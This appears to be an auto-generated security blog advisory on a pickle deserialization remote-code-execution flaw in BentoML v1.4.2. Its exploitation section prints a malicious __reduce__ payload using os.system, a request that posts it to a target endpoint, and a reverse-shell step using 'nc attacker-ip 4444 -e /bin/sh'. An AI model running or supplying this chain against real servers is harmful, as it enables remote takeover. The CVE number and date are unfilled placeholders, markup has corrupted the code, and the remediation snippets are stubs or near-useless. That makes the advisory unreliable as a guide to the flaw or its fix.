BentoML, Insecure Deserialization, CVE-2023-XXXX (Critical)

Listen to this Post

How the CVE Works

The vulnerability exists in BentoML v1.4.2 due to unsafe deserialization in serde.py. The `deserialize_value` function uses Python’s `pickle.loads()` without validation, allowing attackers to craft malicious payloads. When a user sends a manipulated HTTP request containing serialized data, the server deserializes it, executing arbitrary commands. Since the payload is untrusted and directly processed, Remote Code Execution (RCE) is achieved. The exploit leverages Python’s `__reduce__` method in a malicious class, which executes system commands upon deserialization.

DailyCVE Form

Platform: BentoML

Version: v1.4.2

Vulnerability: RCE via deserialization

Severity: Critical

Date: 2023-XX-XX

What Undercode Say:

Exploitation

1. Crafting Payload:

import pickle
import os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('malicious-command',))
payload = pickle.dumps(Exploit())

2. Sending Payload:

import requests
requests.post("http://target:3000/endpoint", data=payload, headers={'Content-Type': 'application/vnd.bentoml+pickle'})

3. Reverse Shell:

nc -lvnp 4444

Modify `__reduce__` to execute nc attacker-ip 4444 -e /bin/sh.

Protection

1. Patch:

Replace `pickle.loads()` with a safe deserializer like `json.loads()`.

2. Input Validation:

def safe_deserialize(payload):
if not validate_payload(payload):
raise ValueError("Invalid payload")

3. Network Controls:

iptables -A INPUT -p tcp --dport 3000 -s trusted-ip -j ACCEPT

4. Monitoring:

grep -r "pickle.loads" /path/to/bentoml

5. Workaround:

Disable affected endpoints until patched.

Detection

1. Log Analysis:

tail -f /var/log/bentoml.log | grep "deserialize_value"

2. YARA Rule:

rule bentoml_rce {
strings:
$pickle = "pickle.loads"
condition:
$pickle
}

Mitigation

  • Upgrade to a fixed version.
  • Restrict network access to BentoML services.
  • Use Web Application Firewalls (WAF) to block suspicious pickle payloads.

References

References:

Reported By: https://github.com/advisories/GHSA-33xw-247w-6hmc
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top